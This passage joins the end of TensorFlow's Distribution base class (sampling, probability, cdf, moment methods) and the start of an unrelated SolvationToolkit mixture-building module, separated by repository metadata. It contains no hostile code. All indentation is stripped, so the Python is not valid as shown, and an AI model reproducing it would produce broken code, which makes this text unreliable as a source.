and `event_shape` defines the shape of samples from each of those independent
distributions. Samples are independent along the `batch_shape` dimensions, but
not necessarily so along the `event_shape` dimensions (depending on the
particulars of the underlying distribution).
Using the `Uniform` distribution as an example:
```python
minval = 3.0
maxval = [[4.0, 6.0],
[10.0, 12.0]]
# Broadcasting:
# This instance represents 4 Uniform distributions. Each has a lower bound at
# 3.0 as the `minval` parameter was broadcasted to match `maxval`'s shape.
u = Uniform(minval, maxval)
# `event_shape` is `TensorShape([])`.
event_shape = u.event_shape
# `event_shape_t` is a `Tensor` which will evaluate to [].
event_shape_t = u.event_shape_tensor()
# Sampling returns a sample per distribution. `samples` has shape
# [5, 2, 2], which is [n] + batch_shape + event_shape, where n=5,
# batch_shape=[2, 2], and event_shape=[].
samples = u.sample_n(5)
# The broadcasting holds across methods. Here we use `cdf` as an example. The
# same holds for `log_cdf` and the likelihood functions.
# `cum_prob` has shape [2, 2] as the `value` argument was broadcasted to the
# shape of the `Uniform` instance.
cum_prob_broadcast = u.cdf(4.0)
# `cum_prob`'s shape is [2, 2], one per distribution. No broadcasting
# occurred.
cum_prob_per_dist = u.cdf([[4.0, 5.0],
[6.0, 7.0]])
# INVALID as the `value` argument is not broadcastable to the distribution's
# shape.
cum_prob_invalid = u.cdf([4.0, 5.0, 6.0])
```
#### Parameter values leading to undefined statistics or distributions.
Some distributions do not have well-defined statistics for all initialization
parameter values. For example, the beta distribution is parameterized by
positive real numbers `concentration1` and `concentration0`, and does not have
well-defined mode if `concentration1 < 1` or `concentration0 < 1`.
The user is given the option of raising an exception or returning `NaN`.
```python
a = tf.exp(tf.matmul(logits, weights_a))
b = tf.exp(tf.matmul(logits, weights_b))
# Will raise exception if ANY batch member has a < 1 or b < 1.
dist = distributions.beta(a, b, allow_nan_stats=False)
mode = dist.mode().eval()
# Will return NaN for batch members with either a < 1 or b < 1.
dist = distributions.beta(a, b, allow_nan_stats=True) # Default behavior
mode = dist.mode().eval()
```
In all cases, an exception is raised if *invalid* parameters are passed, e.g.
```python
# Will raise an exception if any Op is run.
negative_a = -1.0 * a # beta distribution by definition has a > 0.
dist = distributions.beta(negative_a, b, allow_nan_stats=True)
dist.mean().eval()
```
"""
def __init__(self,
dtype,
reparameterization_type,
validate_args,
allow_nan_stats,
parameters=None,
graph_parents=None,
name=None):
"""Constructs the `Distribution`.
**This is a private method for subclass use.**
Args:
dtype: The type of the event samples. `None` implies no type-enforcement.
reparameterization_type: Instance of `ReparameterizationType`.
If `distributions.FULLY_REPARAMETERIZED`, this
`Distribution` can be reparameterized in terms of some standard
distribution with a function whose Jacobian is constant for the support
of the standard distribution. If `distributions.NOT_REPARAMETERIZED`,
then no such reparameterization is available.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
allow_nan_stats: Python `bool`, default `True`. When `True`, statistics
(e.g., mean, mode, variance) use the value "`NaN`" to indicate the
result is undefined. When `False`, an exception is raised if one or
more of the statistic's batch members are undefined.
parameters: Python `dict` of parameters used to instantiate this
`Distribution`.
graph_parents: Python `list` of graph prerequisites of this
`Distribution`.
name: Python `str` name prefixed to Ops created by this class. Default:
subclass name.
Raises:
ValueError: if any member of graph_parents is `None` or not a `Tensor`.
"""
graph_parents = [] if graph_parents is None else graph_parents
for i, t in enumerate(graph_parents):
if t is None or not tensor_util.is_tensor(t):
raise ValueError("Graph parent item %d is not a Tensor; %s." % (i, t))
self._dtype = dtype
self._reparameterization_type = reparameterization_type
self._allow_nan_stats = allow_nan_stats
self._validate_args = validate_args
self._parameters = parameters or {}
self._graph_parents = graph_parents
self._name = name or type(self).__name__
@classmethod
def param_shapes(cls, sample_shape, name="DistributionParamShapes"):
"""Shapes of parameters given the desired shape of a call to `sample()`.
This is a class method that describes what key/value arguments are required
to instantiate the given `Distribution` so that a particular shape is
returned for that instance's call to `sample()`.
Subclasses should override class method `_param_shapes`.
Args:
sample_shape: `Tensor` or python list/tuple. Desired shape of a call to
`sample()`.
name: name to prepend ops with.
Returns:
`dict` of parameter name to `Tensor` shapes.
"""
with ops.name_scope(name, values=[sample_shape]):
return cls._param_shapes(sample_shape)
@classmethod
def param_static_shapes(cls, sample_shape):
"""param_shapes with static (i.e. `TensorShape`) shapes.
This is a class method that describes what key/value arguments are required
to instantiate the given `Distribution` so that a particular shape is
returned for that instance's call to `sample()`. Assumes that the sample's
shape is known statically.
Subclasses should override class method `_param_shapes` to return
constant-valued tensors when constant values are fed.
Args:
sample_shape: `TensorShape` or python list/tuple. Desired shape of a call
to `sample()`.
Returns:
`dict` of parameter name to `TensorShape`.
Raises:
ValueError: if `sample_shape` is a `TensorShape` and is not fully defined.
"""
if isinstance(sample_shape, tensor_shape.TensorShape):
if not sample_shape.is_fully_defined():
raise ValueError("TensorShape sample_shape must be fully defined")
sample_shape = sample_shape.as_list()
params = cls.param_shapes(sample_shape)
static_params = {}
for name, shape in params.items():
static_shape = tensor_util.constant_value(shape)
if static_shape is None:
raise ValueError(
"sample_shape must be a fully-defined TensorShape or list/tuple")
static_params[name] = tensor_shape.TensorShape(static_shape)
return static_params
@staticmethod
def _param_shapes(sample_shape):
raise NotImplementedError("_param_shapes not implemented")
@property
def name(self):
"""Name prepended to all ops created by this `Distribution`."""
return self._name
@property
def dtype(self):
"""The `DType` of `Tensor`s handled by this `Distribution`."""
return self._dtype
@property
def parameters(self):
"""Dictionary of parameters used to instantiate this `Distribution`."""
# Remove "self", "__class__", or other special variables. These can appear
# if the subclass used `parameters = locals()`.
return dict((k, v) for k, v in self._parameters.items()
if not k.startswith("__") and k != "self")
@property
def reparameterization_type(self):
"""Describes how samples from the distribution are reparameterized.
Currently this is one of the static instances
`distributions.FULLY_REPARAMETERIZED`
or `distributions.NOT_REPARAMETERIZED`.
Returns:
An instance of `ReparameterizationType`.
"""
return self._reparameterization_type
@property
def allow_nan_stats(self):
"""Python `bool` describing behavior when a stat is undefined.
Stats return +/- infinity when it makes sense. E.g., the variance of a
Cauchy distribution is infinity. However, sometimes the statistic is
undefined, e.g., if a distribution's pdf does not achieve a maximum within
the support of the distribution, the mode is undefined. If the mean is
undefined, then by definition the variance is undefined. E.g. the mean for
Student's T for df = 1 is undefined (no clear way to say it is either + or -
infinity), so the variance = E[(X - mean)**2] is also undefined.
Returns:
allow_nan_stats: Python `bool`.
"""
return self._allow_nan_stats
@property
def validate_args(self):
"""Python `bool` indicating possibly expensive checks are enabled."""
return self._validate_args
def copy(self, **override_parameters_kwargs):
"""Creates a deep copy of the distribution.
Note: the copy distribution may continue to depend on the original
initialization arguments.
Args:
**override_parameters_kwargs: String/value dictionary of initialization
arguments to override with new values.
Returns:
distribution: A new instance of `type(self)` initialized from the union
of self.parameters and override_parameters_kwargs, i.e.,
`dict(self.parameters, **override_parameters_kwargs)`.
"""
parameters = dict(self.parameters, **override_parameters_kwargs)
return type(self)(**parameters)
def _batch_shape_tensor(self):
raise NotImplementedError("batch_shape_tensor is not implemented")
def batch_shape_tensor(self, name="batch_shape_tensor"):
"""Shape of a single sample from a single event index as a 1-D `Tensor`.
The batch dimensions are indexes into independent, non-identical
parameterizations of this distribution.
Args:
name: name to give to the op
Returns:
batch_shape: `Tensor`.
"""
with self._name_scope(name):
if self.batch_shape.is_fully_defined():
return ops.convert_to_tensor(self.batch_shape.as_list(),
dtype=dtypes.int32,
name="batch_shape")
return self._batch_shape_tensor()
def _batch_shape(self):
return tensor_shape.TensorShape(None)
@property
def batch_shape(self):
"""Shape of a single sample from a single event index as a `TensorShape`.
May be partially defined or unknown.
The batch dimensions are indexes into independent, non-identical
parameterizations of this distribution.
Returns:
batch_shape: `TensorShape`, possibly unknown.
"""
return self._batch_shape()
def _event_shape_tensor(self):
raise NotImplementedError("event_shape_tensor is not implemented")
def event_shape_tensor(self, name="event_shape_tensor"):
"""Shape of a single sample from a single batch as a 1-D int32 `Tensor`.
Args:
name: name to give to the op
Returns:
event_shape: `Tensor`.
"""
with self._name_scope(name):
if self.event_shape.is_fully_defined():
return ops.convert_to_tensor(self.event_shape.as_list(),
dtype=dtypes.int32,
name="event_shape")
return self._event_shape_tensor()
def _event_shape(self):
return tensor_shape.TensorShape(None)
@property
def event_shape(self):
"""Shape of a single sample from a single batch as a `TensorShape`.
May be partially defined or unknown.
Returns:
event_shape: `TensorShape`, possibly unknown.
"""
return self._event_shape()
def is_scalar_event(self, name="is_scalar_event"):
"""Indicates that `event_shape == []`.
Args:
name: The name to give this op.
Returns:
is_scalar_event: `bool` scalar `Tensor`.
"""
with self._name_scope(name):
return ops.convert_to_tensor(
self._is_scalar_helper(self.event_shape, self.event_shape_tensor),
name="is_scalar_event")
def is_scalar_batch(self, name="is_scalar_batch"):
"""Indicates that `batch_shape == []`.
Args:
name: The name to give this op.
Returns:
is_scalar_batch: `bool` scalar `Tensor`.
"""
with self._name_scope(name):
return ops.convert_to_tensor(
self._is_scalar_helper(self.batch_shape, self.batch_shape_tensor),
name="is_scalar_batch")
def _sample_n(self, n, seed=None):
raise NotImplementedError("sample_n is not implemented")
def _call_sample_n(self, sample_shape, seed, name, **kwargs):
with self._name_scope(name, values=[sample_shape]):
sample_shape = ops.convert_to_tensor(
sample_shape, dtype=dtypes.int32, name="sample_shape")
sample_shape, n = self._expand_sample_shape_to_vector(
sample_shape, "sample_shape")
samples = self._sample_n(n, seed, **kwargs)
batch_event_shape = array_ops.shape(samples)[1:]
final_shape = array_ops.concat([sample_shape, batch_event_shape], 0)
samples = array_ops.reshape(samples, final_shape)
samples = self._set_sample_static_shape(samples, sample_shape)
return samples
def sample(self, sample_shape=(), seed=None, name="sample"):
"""Generate samples of the specified shape.
Note that a call to `sample()` without arguments will generate a single
sample.
Args:
sample_shape: 0D or 1D `int32` `Tensor`. Shape of the generated samples.
seed: Python integer seed for RNG
name: name to give to the op.
Returns:
samples: a `Tensor` with prepended dimensions `sample_shape`.
"""
return self._call_sample_n(sample_shape, seed, name)
def _log_prob(self, value):
raise NotImplementedError("log_prob is not implemented")
def _call_log_prob(self, value, name, **kwargs):
with self._name_scope(name, values=[value]):
value = ops.convert_to_tensor(value, name="value")
try:
return self._log_prob(value, **kwargs)
except NotImplementedError as original_exception:
try:
return math_ops.log(self._prob(value, **kwargs))
except NotImplementedError:
raise original_exception
def log_prob(self, value, name="log_prob"):
"""Log probability density/mass function.
Args:
value: `float` or `double` `Tensor`.
name: The name to give this op.
Returns:
log_prob: a `Tensor` of shape `sample_shape(x) + self.batch_shape` with
values of type `self.dtype`.
"""
return self._call_log_prob(value, name)
def _prob(self, value):
raise NotImplementedError("prob is not implemented")
def _call_prob(self, value, name, **kwargs):
with self._name_scope(name, values=[value]):
value = ops.convert_to_tensor(value, name="value")
try:
return self._prob(value, **kwargs)
except NotImplementedError as original_exception:
try:
return math_ops.exp(self._log_prob(value, **kwargs))
except NotImplementedError:
raise original_exception
def prob(self, value, name="prob"):
"""Probability density/mass function.
Args:
value: `float` or `double` `Tensor`.
name: The name to give this op.
Returns:
prob: a `Tensor` of shape `sample_shape(x) + self.batch_shape` with
values of type `self.dtype`.
"""
return self._call_prob(value, name)
def _log_cdf(self, value):
raise NotImplementedError("log_cdf is not implemented")
def _call_log_cdf(self, value, name, **kwargs):
with self._name_scope(name, values=[value]):
value = ops.convert_to_tensor(value, name="value")
try:
return self._log_cdf(value, **kwargs)
except NotImplementedError as original_exception:
try:
return math_ops.log(self._cdf(value, **kwargs))
except NotImplementedError:
raise original_exception
def log_cdf(self, value, name="log_cdf"):
"""Log cumulative distribution function.
Given random variable `X`, the cumulative distribution function `cdf` is:
```none
log_cdf(x) := Log[ P[X <= x] ]
```
Often, a numerical approximation can be used for `log_cdf(x)` that yields
a more accurate answer than simply taking the logarithm of the `cdf` when
`x << -1`.
Args:
value: `float` or `double` `Tensor`.
name: The name to give this op.
Returns:
logcdf: a `Tensor` of shape `sample_shape(x) + self.batch_shape` with
values of type `self.dtype`.
"""
return self._call_log_cdf(value, name)
def _cdf(self, value):
raise NotImplementedError("cdf is not implemented")
def _call_cdf(self, value, name, **kwargs):
with self._name_scope(name, values=[value]):
value = ops.convert_to_tensor(value, name="value")
try:
return self._cdf(value, **kwargs)
except NotImplementedError as original_exception:
try:
return math_ops.exp(self._log_cdf(value, **kwargs))
except NotImplementedError:
raise original_exception
def cdf(self, value, name="cdf"):
"""Cumulative distribution function.
Given random variable `X`, the cumulative distribution function `cdf` is:
```none
cdf(x) := P[X <= x]
```
Args:
value: `float` or `double` `Tensor`.
name: The name to give this op.
Returns:
cdf: a `Tensor` of shape `sample_shape(x) + self.batch_shape` with
values of type `self.dtype`.
"""
return self._call_cdf(value, name)
def _log_survival_function(self, value):
raise NotImplementedError("log_survival_function is not implemented")
def _call_log_survival_function(self, value, name, **kwargs):
with self._name_scope(name, values=[value]):
value = ops.convert_to_tensor(value, name="value")
try:
return self._log_survival_function(value, **kwargs)
except NotImplementedError as original_exception:
try:
return math_ops.log1p(-self.cdf(value, **kwargs))
except NotImplementedError:
raise original_exception
def log_survival_function(self, value, name="log_survival_function"):
"""Log survival function.
Given random variable `X`, the survival function is defined:
```none
log_survival_function(x) = Log[ P[X > x] ]
= Log[ 1 - P[X <= x] ]
= Log[ 1 - cdf(x) ]
```
Typically, different numerical approximations can be used for the log
survival function, which are more accurate than `1 - cdf(x)` when `x >> 1`.
Args:
value: `float` or `double` `Tensor`.
name: The name to give this op.
Returns:
`Tensor` of shape `sample_shape(x) + self.batch_shape` with values of type
`self.dtype`.
"""
return self._call_log_survival_function(value, name)
def _survival_function(self, value):
raise NotImplementedError("survival_function is not implemented")
def _call_survival_function(self, value, name, **kwargs):
with self._name_scope(name, values=[value]):
value = ops.convert_to_tensor(value, name="value")
try:
return self._survival_function(value, **kwargs)
except NotImplementedError as original_exception:
try:
return 1. - self.cdf(value, **kwargs)
except NotImplementedError:
raise original_exception
def survival_function(self, value, name="survival_function"):
"""Survival function.
Given random variable `X`, the survival function is defined:
```none
survival_function(x) = P[X > x]
= 1 - P[X <= x]
= 1 - cdf(x).
```
Args:
value: `float` or `double` `Tensor`.
name: The name to give this op.
Returns:
`Tensor` of shape `sample_shape(x) + self.batch_shape` with values of type
`self.dtype`.
"""
return self._call_survival_function(value, name)
def _entropy(self):
raise NotImplementedError("entropy is not implemented")
def entropy(self, name="entropy"):
"""Shannon entropy in nats."""
with self._name_scope(name):
return self._entropy()
def _mean(self):
raise NotImplementedError("mean is not implemented")
def mean(self, name="mean"):
"""Mean."""
with self._name_scope(name):
return self._mean()
def _quantile(self, value):
raise NotImplementedError("quantile is not implemented")
def _call_quantile(self, value, name, **kwargs):
with self._name_scope(name, values=[value]):
value = ops.convert_to_tensor(value, name="value")
try:
return self._quantile(value, **kwargs)
except NotImplementedError as original_exception:
raise original_exception
def quantile(self, value, name="quantile"):
"""Quantile function. Aka "inverse cdf" or "percent point function".
Given random variable `X` and `p in [0, 1]`, the `quantile` is:
```none
quantile(p) := x such that P[X <= x] == p
```
Args:
value: `float` or `double` `Tensor`.
name: The name to give this op.
Returns:
quantile: a `Tensor` of shape `sample_shape(x) + self.batch_shape` with
values of type `self.dtype`.
"""
return self._call_quantile(value, name)
def _variance(self):
raise NotImplementedError("variance is not implemented")
def variance(self, name="variance"):
"""Variance.
Variance is defined as,
```none
Var = E[(X - E[X])**2]
```
where `X` is the random variable associated with this distribution, `E`
denotes expectation, and `Var.shape = batch_shape + event_shape`.
Args:
name: The name to give this op.
Returns:
variance: Floating-point `Tensor` with shape identical to
`batch_shape + event_shape`, i.e., the same shape as `self.mean()`.
"""
with self._name_scope(name):
try:
return self._variance()
except NotImplementedError as original_exception:
try:
return math_ops.square(self._stddev())
except NotImplementedError:
raise original_exception
def _stddev(self):
raise NotImplementedError("stddev is not implemented")
def stddev(self, name="stddev"):
"""Standard deviation.
Standard deviation is defined as,
```none
stddev = E[(X - E[X])**2]**0.5
```
where `X` is the random variable associated with this distribution, `E`
denotes expectation, and `stddev.shape = batch_shape + event_shape`.
Args:
name: The name to give this op.
Returns:
stddev: Floating-point `Tensor` with shape identical to
`batch_shape + event_shape`, i.e., the same shape as `self.mean()`.
"""
with self._name_scope(name):
try:
return self._stddev()
except NotImplementedError as original_exception:
try:
return math_ops.sqrt(self._variance())
except NotImplementedError:
raise original_exception
def _covariance(self):
raise NotImplementedError("covariance is not implemented")
def covariance(self, name="covariance"):
"""Covariance.
Covariance is (possibly) defined only for non-scalar-event distributions.
For example, for a length-`k`, vector-valued distribution, it is calculated
as,
```none
Cov[i, j] = Covariance(X_i, X_j) = E[(X_i - E[X_i]) (X_j - E[X_j])]
```
where `Cov` is a (batch of) `k x k` matrix, `0 <= (i, j) < k`, and `E`
denotes expectation.
Alternatively, for non-vector, multivariate distributions (e.g.,
matrix-valued, Wishart), `Covariance` shall return a (batch of) matrices
under some vectorization of the events, i.e.,
```none
Cov[i, j] = Covariance(Vec(X)_i, Vec(X)_j) = [as above]
```
where `Cov` is a (batch of) `k' x k'` matrices,
`0 <= (i, j) < k' = reduce_prod(event_shape)`, and `Vec` is some function
mapping indices of this distribution's event dimensions to indices of a
length-`k'` vector.
Args:
name: The name to give this op.
Returns:
covariance: Floating-point `Tensor` with shape `[B1, ..., Bn, k', k']`
where the first `n` dimensions are batch coordinates and
`k' = reduce_prod(self.event_shape)`.
"""
with self._name_scope(name):
return self._covariance()
def _mode(self):
raise NotImplementedError("mode is not implemented")
def mode(self, name="mode"):
"""Mode."""
with self._name_scope(name):
return self._mode()
@contextlib.contextmanager
def _name_scope(self, name=None, values=None):
"""Helper function to standardize op scope."""
with ops.name_scope(self.name):
with ops.name_scope(name, values=(
([] if values is None else values) + self._graph_parents)) as scope:
yield scope
def _expand_sample_shape_to_vector(self, x, name):
"""Helper to `sample` which ensures input is 1D."""
x_static_val = tensor_util.constant_value(x)
if x_static_val is None:
prod = math_ops.reduce_prod(x)
else:
prod = np.prod(x_static_val, dtype=x.dtype.as_numpy_dtype())
ndims = x.get_shape().ndims # != sample_ndims
if ndims is None:
# Maybe expand_dims.
ndims = array_ops.rank(x)
expanded_shape = util.pick_vector(
math_ops.equal(ndims, 0),
np.array([1], dtype=np.int32), array_ops.shape(x))
x = array_ops.reshape(x, expanded_shape)
elif ndims == 0:
# Definitely expand_dims.
if x_static_val is not None:
x = ops.convert_to_tensor(
np.array([x_static_val], dtype=x.dtype.as_numpy_dtype()),
name=name)
else:
x = array_ops.reshape(x, [1])
elif ndims != 1:
raise ValueError("Input is neither scalar nor vector.")
return x, prod
def _set_sample_static_shape(self, x, sample_shape):
"""Helper to `sample`; sets static shape info."""
# Set shape hints.
sample_shape = tensor_shape.TensorShape(
tensor_util.constant_value(sample_shape))
ndims = x.get_shape().ndims
sample_ndims = sample_shape.ndims
batch_ndims = self.batch_shape.ndims
event_ndims = self.event_shape.ndims
# Infer rank(x).
if (ndims is None and
sample_ndims is not None and
batch_ndims is not None and
event_ndims is not None):
ndims = sample_ndims + batch_ndims + event_ndims
x.set_shape([None] * ndims)
# Infer sample shape.
if ndims is not None and sample_ndims is not None:
shape = sample_shape.concatenate([None]*(ndims - sample_ndims))
x.set_shape(x.get_shape().merge_with(shape))
# Infer event shape.
if ndims is not None and event_ndims is not None:
shape = tensor_shape.TensorShape(
[None]*(ndims - event_ndims)).concatenate(self.event_shape)
x.set_shape(x.get_shape().merge_with(shape))
# Infer batch shape.
if batch_ndims is not None:
if ndims is not None:
if sample_ndims is None and event_ndims is not None:
sample_ndims = ndims - batch_ndims - event_ndims
elif event_ndims is None and sample_ndims is not None:
event_ndims = ndims - batch_ndims - sample_ndims
if sample_ndims is not None and event_ndims is not None:
shape = tensor_shape.TensorShape([None]*sample_ndims).concatenate(
self.batch_shape).concatenate([None]*event_ndims)
x.set_shape(x.get_shape().merge_with(shape))
return x
def _is_scalar_helper(self, static_shape, dynamic_shape_fn):
"""Implementation for `is_scalar_batch` and `is_scalar_event`."""
if static_shape.ndims is not None:
return static_shape.ndims == 0
shape = dynamic_shape_fn()
if (shape.get_shape().ndims is not None and
shape.get_shape()[0].value is not None):
# If the static_shape is correctly written then we should never execute
# this branch. We keep it just in case there's some unimagined corner
# case.
return shape.get_shape().as_list() == [0]
return math_ops.equal(array_ops.shape(shape)[0], 0)
|
maciekcc/tensorflow
|
tensorflow/python/ops/distributions/distribution.py
|
Python
|
apache-2.0
| 38,421
|
[
"Gaussian"
] |
52b1f6e56430215d9be30f1664ecdec5c09c9fe81be83c55c62b8ced99dba09c
|
######################################################################
# SolvationToolkit: A toolkit for setting up molecular simulations of mixtures
# Copyright 2011-2016 UC Irvine and the Authors
#
# Authors: David Mobley and Gaetano Calabro
# With thanks to Kyle Beauchamp, whose liquid_tools.py provided an initial basis for this code
# (https://github.com/choderalab/LiquidBenchmark/blob/master/src/simulation/liquid_tools.py) in April 2015
#
#This library is free software; you can redistribute it and/or
#modify it under the terms of the GNU Lesser General Public
#License as published by the Free Software Foundation; either
#version 2.1 of the License, or (at your option) any later version.
#
#This library is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
#Lesser General Public License for more details.
#
#You should have received a copy of the GNU Lesser General Public
#License along with this library; if not, see <http://www.gnu.org/licenses/>.
######################################################################
import numpy as np
import os,sys
import inspect
import itertools
import mdtraj as md
import parmed
import openmoltools
import solvationtoolkit.mol2tosdf as mol2tosdf
from openeye.oechem import *
from openeye.oeiupac import *
from simtk.unit import *
# We require at least ParmEd 2.5.1 because of issues with the .mol2 writer (issue #691 on ParmEd) prior to that, and 2.5.1.10 because of OpenEye reader formatting bugs requireing compressed spacing in .mol2 files (added in ParmEd 2.5.1.10)
# Previously 2.0.4 or later was required due to issues with FudgeLJ/FudgeQQ in resulting GROMACS topologies in
# earlier versions
try: #Try to get version tag
ver = parmed.version
except: #If too old for version tag, it is too old
oldParmEd = Exception('ERROR: ParmEd is too old, please upgrade to 2.5.1 or later')
raise oldParmEd
if ver < (2,5,1,10):
raise RuntimeError("ParmEd is too old, please upgrade to 2.5.1 or later")
def make_path(pathname):
try:
os.makedirs(pathname)
except:
pass
class MixtureSystem(object):
"""A pipeline for simulating liquid mixtures using amber and gromacs parameter files.
Limitations
-----------
Existing files with the same name present in the data directory tree may be overwritten.
This results in a limitation/failure in a small (and probably random) fraction of cases
if multiple systems involving the same monomers are written into the same data directory.
Specifically, openmoltools.amber.build_mixture_prmtop requires that each mol2 file for a
component have a unique residue name, which is handled automatically by openmoltools when
constructing monomers (each is assigned a unique random residue name). However, if these
are overwritten with other monomers (i.e. if we set up, say, 'octanol' in the same directory twice)
which by chance end up with non-unique residue names then amber.build_mixture_prmtop will
fail with a ValueError. This can be avoided by ensuring that if you are constructing multiple
MixtureSystems involving the same monomers, your data directories are different.
This issue also will likely be fixed when openmoltools switches to topology merging
via ParmEd rather than tleap, as unique residue names are built into ParmEd in a better way.
"""
def __init__(self, directory='data'):
"""
Initialization of the Molecule Database Class
Parameters
----------
directory : str
the directory name used to save the data
"""
# Set directory names
self.data_path = directory
self.data_path_monomers = os.path.join(self.data_path,'monomers')
self.data_path_packmol = os.path.join(self.data_path,'packmol_boxes')
self.data_path_amber = os.path.join(self.data_path,'amber')
self.data_path_gromacs = os.path.join(self.data_path,'gromacs')
# List container of all the added components to the solution
self.component_list = []
# List of all the smile strings
self.smile_strings = []
# List of all the number of monomers
self.n_monomers = []
# List of all the mole fractions
self.mole_fractions = []
# List of all the effective compound names. If the compond name is None
# than the compound label will be used in this list as compound name
self.labels = []
# The filling compound is a compound with None molecule number and None
# mole fraction. It is used to fill out the solution
self.filling_compound = None
# Lists of filenames related to gaff mol2 files, amber files and sdf file format
self.gaff_mol2_filenames = []
self.frcmod_filenames = []
self.inpcrd_filenames = []
self.prmtop_filenames = []
self.sdf_filenames = []
# Usefull strings used to concatenate the previous lists of filenames
self.mix_fname = ''
self.pdb_filename = ''
self.prmtop_filename = ''
self.inpcrd_filename = ''
self.top_filename = ''
self.gro_filename = ''
# Index used to perform index selection by using __iter__ function
self.__ci = 0
return
def __str__(self):
"""
Printing object function
"""
string = ''
for i in self.component_list:
string = string + str(i)
return string
def __iter__(self):
"""
Index generator
"""
return self
def next(self): # Python 3: def __next__(self)
"""
Select the molecule during an iteration
"""
if self.__ci > len(self.component_list) - 1:
self.__ci = 0
raise StopIteration
else:
self.__ci = self.__ci + 1
return self.component_list[self.__ci - 1]
def __getitem__(self, index):
"""
Index selection function
"""
return self.component_list[index]
def __setitem__(self, index, component):
"""
Index setting function
Parameters
----------
index : int
the component index
component : Component obj
the component to assign to the component in the mixture
MixtureSystem[index] = component
"""
if not isinstance(component, Component):
raise ValueError('The passed component is not a Component class object')
self.component_list[index] = component
def addComponent(self, name=None, **args):
"""
Add a compoennt to the solution
Parameters
----------
name : string
the name of the compound to add the solution
**args : see class Component for a full description
"""
# Component object creation
component=Component(name, **args)
# Add object to the componet list
self.component_list.append(component)
def build(self, amber=False, gromacs=False, solute_index='auto'):
"""
Build all the monomers and the amber or gromacs mixture files
Parameters
----------
amber : bool
this flag is used to control if output or not the amber files
gromacs : bool
this flag is used to control if output or not the gromacs files
solute_index : int/str, optional. Default: "auto"
Optional parameter to specify which of the components (in the list of specified components)
will be treated as a solute in constructing GROMACS topology files
(which means that a single molecule of this component will be singled out as the 'solute'
in the resulting GROMACS topology file). Valid options are 'auto'
(pick the first component present with n_monomers = 1,
otherwise the first component), None (don't pick any), or an integer
(pick the component smiles_strings[solute_index].
"""
def build_monomers(self):
"""
Generate GAFF mol2 and frcmod files for each chemical
"""
# Filenames generation
for comp in self.component_list:
if comp.label:
mol2_filename = os.path.join(self.data_path_monomers, comp.label+'.mol2')
frcmod_filename = os.path.join(self.data_path_monomers, comp.label+'.frcmod')
inpcrd_filename = os.path.join(self.data_path_monomers, comp.label+'.inpcrd')
prmtop_filename = os.path.join(self.data_path_monomers, comp.label+'.prmtop')
sdf_filename = os.path.join(self.data_path_monomers, comp.label+'.sdf')
self.mix_fname = self.mix_fname + '_' + comp.label
else:
mol2_filename = os.path.join(self.data_path_monomers, comp.name+'.mol2')
frcmod_filename = os.path.join(self.data_path_monomers, comp.name+'.frcmod')
inpcrd_filename = os.path.join(self.data_path_monomers, comp.name+'.inpcrd')
prmtop_filename = os.path.join(self.data_path_monomers, comp.name+'.prmtop')
sdf_filename = os.path.join(self.data_path_monomers, comp.name+'.sdf')
self.mix_fname = self.mix_fname + '_' + comp.name
# Filling compound selection
if comp.numbers == None and comp.mole_fraction == None:
if self.filling_compound == None:
self.filling_compound = comp
self.mole_fractions.append(comp.mole_fraction)
else:
raise ValueError('Error: Two or more fillig compounds have been specified')
# Number and mol fractions lists generation
if comp.numbers:
self.n_monomers.append(comp.numbers)
if comp.mole_fraction is not None:
self.mole_fractions.append(comp.mole_fraction)
# Lists of filenames generation
self.smile_strings.append(comp.smile)
self.gaff_mol2_filenames.append(mol2_filename)
self.frcmod_filenames.append(frcmod_filename)
self.inpcrd_filenames.append(inpcrd_filename)
self.prmtop_filenames.append(prmtop_filename)
self.sdf_filenames.append(sdf_filename)
if not (os.path.exists(mol2_filename) and os.path.exists(frcmod_filename)):
#Convert SMILES strings to mol2 and frcmod files for antechamber
openmoltools.openeye.smiles_to_antechamber(comp.smile, mol2_filename, frcmod_filename)
#Correct the mol2 file partial atom charges to have a total net integer molecule charge
mol2f = parmed.formats.Mol2File
mol2f.write(parmed.load_file(mol2_filename).fix_charges(),mol2_filename, compress_whitespace=True)
#Generate amber coordinate and topology files for the unsolvated molecules
mol_name = os.path.basename(mol2_filename).split('.')[0]
openmoltools.amber.run_tleap(mol_name, mol2_filename, frcmod_filename, prmtop_filename, inpcrd_filename)
#Read Mol2 File and write SDF file
mol2tosdf.writeSDF(mol2_filename, sdf_filename, mol_name)
#Generate unique residue names for molecules in mol2 files
openmoltools.utils.randomize_mol2_residue_names(self.gaff_mol2_filenames)
def build_boxes(self):
"""
Build an initial box with packmol and use it to generate AMBER files
"""
def mole_fractions_to_n_monomers(self, density= 1 * grams/milliliter, cutoff=12*angstrom):
"""
This function is used to generate the number of molecules for each compound
in the solution from the mole fractions of each molecule.
Parameters
----------
density : openmm units
the solution density
cutoff : openmm units
the cutoff distance of the largest compound in the solution
Returns
-------
self.n_monomers : integer list
the list of molecule number for each compound in the solution
size : float
the edge of the box volume
"""
# Calculate the maximum atomic distance in a molecule
def max_dist_mol(mol):
max_dist = 0.0
coords = mol.GetCoords() # Are the coords always in A in mol2 file?
for i in range(0, mol.NumAtoms()):
crdi = np.array([coords[i][0], coords[i][1], coords[i][2]])
for j in range(i+1, mol.NumAtoms()):
crdj = np.array([coords[j][0], coords[j][1], coords[j][2]])
dist = np.linalg.norm(crdi-crdj)
if dist > max_dist:
max_dist = dist
return max_dist * angstrom
# The sum of all the mole fractions
sum_fractions = sum([i for i in self.mole_fractions if i != None])
if sum_fractions > 1.0:
raise ValueError('Error: The total molar fraction is greater than 1.0')
if sum_fractions == 1.0 and self.filling_compound:
raise ValueError('Error: The total molar fraction is 1.0 and it is not possible to add any filling compound to the solution')
if sum_fractions < 1.0 and not self.filling_compound:
raise ValueError('Error: The total molar fraction is less than 1.0 and the filling compoind is missing')
if self.filling_compound:
self.filling_compound.mole_fraction = 1.0 - sum_fractions
self.mole_fractions = [i if i != None else (1.0 - sum_fractions) for i in self.mole_fractions]
max_dist_mols = 0.0 * angstrom
delta_volume = 0.0 * angstrom**3
sum_wgt_frac = 0.0 * grams/mole
for i in range(0, len(self.sdf_filenames)):
istream = oemolistream(self.sdf_filenames[i])#gaff_mol2_files give wrong wgt because not sybyl format!
mol = oechem.OEMol()
if not OEReadMolecule(istream, mol):
